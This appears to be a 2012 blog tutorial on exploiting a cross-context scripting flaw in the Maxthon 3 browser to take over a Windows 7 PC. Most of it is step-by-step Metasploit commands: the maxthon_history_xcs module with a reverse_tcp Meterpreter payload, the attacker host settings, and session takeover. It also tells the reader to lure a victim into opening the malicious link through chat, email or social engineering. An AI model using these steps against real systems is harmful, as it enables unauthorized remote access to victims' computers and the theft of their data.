Wednesday, December 12, 2012

Exploting Windws 7 PC using Maxthon3 about:history XCS Trusted Zone Code Execution

Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.

Exploit Targets
Maxthon 3.1.7 build 600

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/maxthon_history_xcs
msf exploit (maxthon_history_xcs)>set payload windows/meterpreter/reverse_tcp
msf exploit (maxthon_history_xcs)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (maxthon_history_xcs)>set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit (maxthon_history_xcs)>set uripath / (The Url to use for this exploit)
msf exploit (maxthon_history_xcs)>exploit  


Now an URL you should give to your victim http://192.168.1.3:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 


No comments:

Post a Comment